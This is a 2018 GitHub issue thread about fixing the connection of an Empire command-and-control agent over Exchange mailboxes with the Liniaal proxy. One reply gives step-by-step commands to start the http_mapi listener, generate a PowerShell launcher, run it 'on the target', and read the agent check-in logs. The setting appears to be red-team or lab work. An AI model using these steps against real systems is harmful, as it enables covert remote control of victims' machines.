
Could not get the agent connected.

Open 3xpl01tc0d3r opened this issue 6 years ago • 5 comments

I'm facing an issue while using the launcher with the mapi listener, and after some fixes I'm still not able to get the agent connected.

After executing the payload manually, it seems like the payload is missing some "}".

Below is the error:

Missing closing '}' in statement block or type definition.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingEndCurlyBrace

Attached is the http_mapi.py code which I used after some fixes.

http_mapi.txt

3xpl01tc0d3r, Jul 04 '18 16:07

Hi!

Using the fork at staaldraad/liniaal and copying the http_mapi.py and http_mapi.ps1 files across, I get the agent to connect.

I've had to make a fix to include the "Slack_Token", but even without this the agent should still set up correctly. The changes are available in this branch: https://github.com/staaldraad/liniaal/tree/empire-updates

There is another issue now, though: it looks like the communications have changed slightly (I think), because the agent stops checking in after the first check-in. I think I know what is happening, but I'm still looking into it; I'll hopefully get some time later tonight.

staaldraad, Jul 05 '18 07:07

And fixed. The new Empire agent uses GetTask and SendMessage instead of Get-Task and Send-Message for the comms functions.

I've updated my fork to include these changes. I'll open PRs for Empire and for this Repo.

staaldraad, Jul 05 '18 09:07

I am still not able to get the agent connected. I downloaded the http_mapi.py code which you have modified, but I am still not able to get it connected.

3xpl01tc0d3r, Jul 05 '18 18:07

I've just tested again with the following steps:

git clone https://github.com/staaldraad/Empire.git
cd Empire
git checkout update-mapi-agent
./setup/install.sh
./empire

Then, in Empire:

> listeners
> uselistener http_mapi
> set Email <targetMailbox>
> set Folder yourfolder #try a different folder from the default Liniaal
> execute
> launcher powershell
<copy this launcher>

Start the Liniaal "proxy":

./liniaal
> set Email <targetEmail>
> set Password <password>
> set Host http://locationOfEmpire #in my case the same host, so http://localhost
> set Folder yourfolder #same as set above
> execute

The above might crash out the first time, as it creates the non-existent folder. Just run it again and it should work.

Now launch the PowerShell command on the target.

You should see something similar to this in the Liniaal proxy:

[+] Agent Listening
[+] Got message from Agent at: 05/07/2018 10:21:11 AM Payload: GET - 7BQzGKC4y1yQ1CzqHnGdGanPtWM= - /news.php
[+] Got message from Agent at: 05/07/2018 10:21:13 AM Payload: GET - QQX7CTjK6NP4wSvpEDHFGhiXYo0= - /news.php
[+] Got message from Agent at: 05/07/2018 10:22:02 AM Payload: POSTM - /admin/get.php - JaliNK12iwz+

In Empire you might see the following messages. I'll have a look to find out why these are coming through.

[!] Error: bad signal recieved [*] GET request for localhost/ ViKAJSshm4wMrTJQE3xtf690JZM= from 127.0.0.1 from sender listeners/http
[!] Error: bad signal recieved [*] Sending POWERSHELL stager (stage 1) to 127.0.0.1 from sender listeners/http

It is all pretty slow, but the comms were working for me.


staaldraad, Jul 05 '18 18:07

Thanks for the step-by-step guide. I tried it with an outlook.com email address and it worked, but it is not working with my own lab Exchange server. I cannot even see the liniaal proxy sending any payload when trying with my lab Exchange environment.

3xpl01tc0d3r, Jul 07 '18 16:07